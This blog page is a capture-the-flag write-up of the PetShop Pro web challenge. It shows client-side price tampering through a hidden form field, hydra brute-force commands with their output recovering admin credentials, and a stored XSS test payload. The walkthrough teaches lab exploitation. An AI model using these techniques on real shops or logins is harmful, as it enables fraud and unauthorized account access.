
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
        <meta name="author" content="triki">
      
      
      <link rel="icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.2.3, mkdocs-material-8.0.5">
    
    
      
        <title>PetShop Pro Write-up - ikirt.github.io</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.a617204b.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.9204c3b2.min.css">
        
      
    
    
    
      
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,400i,700%7CRoboto+Mono&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
    <script>__md_scope=new URL("../..",location),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
  </head>
  
  
    
    
    
    
    
    <body dir="ltr" data-md-color-scheme="slate" data-md-color-primary="" data-md-color-accent="">
  
    
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#difficulty-easy" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../.." title="ikirt.github.io" class="md-header__button md-logo" aria-label="ikirt.github.io" data-md-component="logo">
      
  <img src="../../logo.jpg" alt="logo">

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            ikirt.github.io
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              PetShop Pro Write-up
            
          </span>
        </div>
      </div>
    </div>
    
    
    
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="ikirt.github.io" class="md-nav__button md-logo" aria-label="ikirt.github.io" data-md-component="logo">
      
  <img src="../../logo.jpg" alt="logo">

    </a>
    ikirt.github.io
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../.." class="md-nav__link">
        Welcome
      </a>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_2" type="checkbox" id="__nav_2" >
      
      
      
      
        <label class="md-nav__link" for="__nav_2">
          3D
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="3D" data-md-level="1">
        <label class="md-nav__title" for="__nav_2">
          <span class="md-nav__icon md-icon"></span>
          3D
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/2021-04-06-my-haribo/" class="md-nav__link">
        3D printing
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/TMC5160/" class="md-nav__link">
        TMC5160
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/mks-genv14/" class="md-nav__link">
        MKS Gen v1.4
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/skrv14/" class="md-nav__link">
        SKR v1.4 Turbo
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/tmc2209/" class="md-nav__link">
        TMC2209
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
    
  
  
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_3" type="checkbox" id="__nav_3" checked>
      
      
      
      
        <label class="md-nav__link" for="__nav_3">
          Hackerone
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Hackerone" data-md-level="1">
        <label class="md-nav__title" for="__nav_3">
          <span class="md-nav__icon md-icon"></span>
          Hackerone
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
    
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" data-md-toggle="toc" type="checkbox" id="__toc">
      
      
        
      
      
      <a href="./" class="md-nav__link md-nav__link--active">
        PetShop Pro Write-up
      </a>
      
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-04-08-thermostat/" class="md-nav__link">
        H1 Thermostat Write-up
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4" type="checkbox" id="__nav_4" >
      
      
      
      
        <label class="md-nav__link" for="__nav_4">
          Htb
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Htb" data-md-level="1">
        <label class="md-nav__title" for="__nav_4">
          <span class="md-nav__icon md-icon"></span>
          Htb
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../htb/2019-10-20-postman/" class="md-nav__link">
        Postman Write-up
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../htb/2019-11-10-traverxec/" class="md-nav__link">
        Traverxec Write-up
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../htb/2020-03-18-traceback/" class="md-nav__link">
        Traceback Write-up
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../htb/2020-06-16-htb-oh-my-zsh-theme/" class="md-nav__link">
        oh-my-zsh htb theme
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../htb/2020-07-12-blunder/" class="md-nav__link">
        Blunder Write-up
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../htb/2020-07-16-tabby/" class="md-nav__link">
        Tabby Write-up
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../htb/2020-07-19-admirer/" class="md-nav__link">
        Admirer Write-up
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../htb/2020-08-05-buff/" class="md-nav__link">
        Buff Write-up
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../htb/2020-09-10-doctor/" class="md-nav__link">
        Doctor Write-up
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../htb/2020-09-20-omni/" class="md-nav__link">
        Omni Write-up
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../htb/2020-12-16-academy/" class="md-nav__link">
        Academy Write-up
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../htb/2021-03-22-scriptkiddie/" class="md-nav__link">
        ScriptKiddie Write-up
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../htb/2021-05-07-spectra/" class="md-nav__link">
        Spectra Write-up
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_5" type="checkbox" id="__nav_5" >
      
      
      
      
        <label class="md-nav__link" for="__nav_5">
          Mc
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Mc" data-md-level="1">
        <label class="md-nav__title" for="__nav_5">
          <span class="md-nav__icon md-icon"></span>
          Mc
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../mc/2020-04-19-esp32-presence-ha/" class="md-nav__link">
        ESP32 BLE Room Presence with HomeAssistant
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
</nav>
                  </div>
                </div>
              </div>
            
          
          <div class="md-content" data-md-component="content">
            <article class="md-content__inner md-typeset">
              
                

<h1 id="difficulty-easy">Difficulty (easy)</h1>
<p>Let's walkthrough PetShop Pro. We start off with a simple ecomm site with a simple cart setup. There are 3 flags for this CTF.</p>
<p><strong>Flag 1</strong>
<strong><em>Shopping Cart</em></strong></p>
<p><img alt="HomePage" src="/images/petshoppro/homepage.png" /></p>
<p>First thing i check is to see is there is anything on the checkout page. So I add an item and proceed to checkout.</p>
<p>I want to see if there are any hidden fields on the web page so I enable firefox Inspector tool.</p>
<p><img alt="HomePage" src="/images/petshoppro/shoppingcart-hack.png" /></p>
<p>here I see a hidden field:</p>
<p><img alt="HomePage" src="/images/petshoppro/shoppingcart-hack2.png" /></p>
<p>Here I see a hardcoded price "8.95", let's see if we can change that to "0.00" and checkout.</p>
<p><img alt="HomePage" src="/images/petshoppro/shoppingcart-hack3.png" /></p>
<p>Yes, the page allows us to proceed and checkout with the balance of $0.00. Not good for the site owner, but good for me, I get a free kitty !!</p>
<p>Flag #1 <strong>done</strong></p>
<p><strong>Flag 2</strong>
<strong><em>Admin Panel</em></strong></p>
<p>This site has to have an Admin Panel. Wfuzz can be used to brute force this, but I got $%@! lucky and guessed /login and came upon this screen.</p>
<p><img alt="HomePage" src="/images/petshoppro/adminlogin1.png" /></p>
<p>Here is decided to use hydra to brude for this in 2 parts.</p>
<div class="highlight"><pre><span></span><code>1. Find valid Username
2. Find the user password.
</code></pre></div>
<ol>
<li>To find the information used for Hydra I used Burp to capture an HTTP Post login request. In Burp you can see the response to get the correct Error the page displays.</li>
</ol>
<p><img alt="HomePage" src="/images/petshoppro/burploginrequest.png" /></p>
<div class="highlight"><pre><span></span><code><span class="o">[</span>root@kalima/opt/htb/boxes<span class="o">]</span>$ hydra -f -L /usr/share/wordlists/usernames.txt -p admin <span class="m">34</span>.74.105.127 http-post-form <span class="s2">&quot;/9c951cb4b9/login:username=^USER^&amp;password=^PASS^:Invalid username&quot;</span> -t <span class="m">50</span> 
Hydra v9.0 <span class="o">(</span>c<span class="o">)</span> <span class="m">2019</span> by van Hauser/THC - Please <span class="k">do</span> not use <span class="k">in</span> military or secret service organizations, or <span class="k">for</span> illegal purposes.

Hydra <span class="o">(</span>https://github.com/vanhauser-thc/thc-hydra<span class="o">)</span> starting at <span class="m">2020</span>-03-09 <span class="m">16</span>:38:58
<span class="o">[</span>WARNING<span class="o">]</span> Restorefile <span class="o">(</span>you have <span class="m">10</span> seconds to abort... <span class="o">(</span>use option -I to skip waiting<span class="o">))</span> from a previous session found, to prevent overwriting, ./hydra.restore
<span class="o">[</span>DATA<span class="o">]</span> max <span class="m">50</span> tasks per <span class="m">1</span> server, overall <span class="m">50</span> tasks, <span class="m">86771</span> login tries <span class="o">(</span>l:86771/p:1<span class="o">)</span>, ~1736 tries per task
<span class="o">[</span>DATA<span class="o">]</span> attacking http-post-form://34.74.105.127:80/9c951cb4b9/login:username<span class="o">=</span>^USER^<span class="p">&amp;</span><span class="nv">password</span><span class="o">=</span>^PASS^:Invalid username
<span class="m">1</span><span class="o">[</span>STATUS<span class="o">]</span> <span class="m">7683</span>.00 tries/min, <span class="m">7683</span> tries <span class="k">in</span> <span class="m">00</span>:01h, <span class="m">79088</span> to <span class="k">do</span> <span class="k">in</span> <span class="m">00</span>:11h, <span class="m">50</span> active
<span class="o">[</span>STATUS<span class="o">]</span> <span class="m">7744</span>.00 tries/min, <span class="m">23232</span> tries <span class="k">in</span> <span class="m">00</span>:03h, <span class="m">63539</span> to <span class="k">do</span> <span class="k">in</span> <span class="m">00</span>:09h, <span class="m">50</span> active

<span class="o">[</span><span class="m">80</span><span class="o">][</span>http-post-form<span class="o">]</span> host: <span class="m">34</span>.74.105.127   login: kylie   password: admin
<span class="o">[</span>STATUS<span class="o">]</span> attack finished <span class="k">for</span> <span class="m">34</span>.74.105.127 <span class="o">(</span>valid pair found<span class="o">)</span>
<span class="m">1</span> of <span class="m">1</span> target successfully completed, <span class="m">1</span> valid password found
Hydra <span class="o">(</span>https://github.com/vanhauser-thc/thc-hydra<span class="o">)</span> finished at <span class="m">2020</span>-03-09 <span class="m">16</span>:44:55
</code></pre></div>
<p>Sweet, got a valid user, now lets find the password, I will use hydra again.</p>
<div class="highlight"><pre><span></span><code><span class="o">[</span>root@kalima/opt/htb/boxes<span class="o">]</span>$ hydra -f -l kylie -P /usr/share/wordlists/seclists/Passwords/darkweb2017-top10000.txt <span class="m">34</span>.74.105.127 http-post-form <span class="s2">&quot;/9c951cb4b9/login:username=^USER^&amp;password=^PASS^:Invalid password&quot;</span> -t <span class="m">50</span> 
Hydra v9.0 <span class="o">(</span>c<span class="o">)</span> <span class="m">2019</span> by van Hauser/THC - Please <span class="k">do</span> not use <span class="k">in</span> military or secret service organizations, or <span class="k">for</span> illegal purposes.

Hydra <span class="o">(</span>https://github.com/vanhauser-thc/thc-hydra<span class="o">)</span> starting at <span class="m">2020</span>-03-09 <span class="m">16</span>:52:14
<span class="o">[</span>DATA<span class="o">]</span> max <span class="m">50</span> tasks per <span class="m">1</span> server, overall <span class="m">50</span> tasks, <span class="m">9999</span> login tries <span class="o">(</span>l:1/p:9999<span class="o">)</span>, ~200 tries per task
<span class="o">[</span>DATA<span class="o">]</span> attacking http-post-form://34.74.105.127:80/9c951cb4b9/login:username<span class="o">=</span>^USER^<span class="p">&amp;</span><span class="nv">password</span><span class="o">=</span>^PASS^:Invalid password
<span class="o">[</span><span class="m">80</span><span class="o">][</span>http-post-form<span class="o">]</span> host: <span class="m">34</span>.74.105.127   login: kylie   password: kristin
<span class="o">[</span>STATUS<span class="o">]</span> attack finished <span class="k">for</span> <span class="m">34</span>.74.105.127 <span class="o">(</span>valid pair found<span class="o">)</span>
<span class="m">1</span> of <span class="m">1</span> target successfully completed, <span class="m">1</span> valid password found
Hydra <span class="o">(</span>https://github.com/vanhauser-thc/thc-hydra<span class="o">)</span> finished at <span class="m">2020</span>-03-09 <span class="m">16</span>:52:38
</code></pre></div>
<div class="highlight"><pre><span></span><code>kylie:kristin
</code></pre></div>
<p>Now I have a user and password, time to login.</p>
<p><img alt="HomePage" src="/images/petshoppro/adminlogin2.png" /></p>
<p>Flag #2 <strong>done</strong></p>
<p><strong>Flag 3</strong>
<strong><em>XSS</em></strong></p>
<p>Editing one of the items we are presented with a web form, lets see if it's vulnerable to XSS</p>
<p>I will test by adding to Name and Description fields.
<div class="highlight"><pre><span></span><code><span class="p">&lt;</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(1)</span><span class="p">&gt;</span>
</code></pre></div></p>
<p><img alt="HomePage" src="/images/petshoppro/xss1.png" /></p>
<p>After saving, I went to the main page where I was prompt with a popup, woohoo, good sign, next I went to the checkout page to see this.</p>
<p><img alt="HomePage" src="/images/petshoppro/xss2.png" /></p>
<p>Flag #3 <strong>done</strong></p>

  <hr>
<div class="md-source-file">
  <small>
    
      Last update:
      <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">December 22, 2021</span>
      
    
  </small>
</div>

              
            </article>
          </div>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
    <nav class="md-footer__inner md-grid" aria-label="Footer">
      
        
        <a href="../../3D/tmc2209/" class="md-footer__link md-footer__link--prev" aria-label="Previous: TMC2209" rel="prev">
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
          </div>
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                Previous
              </span>
              TMC2209
            </div>
          </div>
        </a>
      
      
        
        <a href="../2020-04-08-thermostat/" class="md-footer__link md-footer__link--next" aria-label="Next: H1 Thermostat Write-up" rel="next">
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                Next
              </span>
              H1 Thermostat Write-up
            </div>
          </div>
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M4 11v2h12l-5.5 5.5 1.42 1.42L19.84 12l-7.92-7.92L10.5 5.5 16 11H4z"/></svg>
          </div>
        </a>
      
    </nav>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    <script id="__config" type="application/json">{"base": "../..", "features": ["content.code.annotate"], "translations": {"clipboard.copy": "Copy to clipboard", "clipboard.copied": "Copied to clipboard", "search.config.lang": "en", "search.config.pipeline": "trimmer, stopWordFilter", "search.config.separator": "[\\s\\-]+", "search.placeholder": "Search", "search.result.placeholder": "Type to start searching", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.term.missing": "Missing", "select.version.title": "Select version"}, "search": "../../assets/javascripts/workers/search.cefbb252.min.js"}</script>
    
    
      <script src="../../assets/javascripts/bundle.a5f8ea78.min.js"></script>
      
    
  </body>
</html>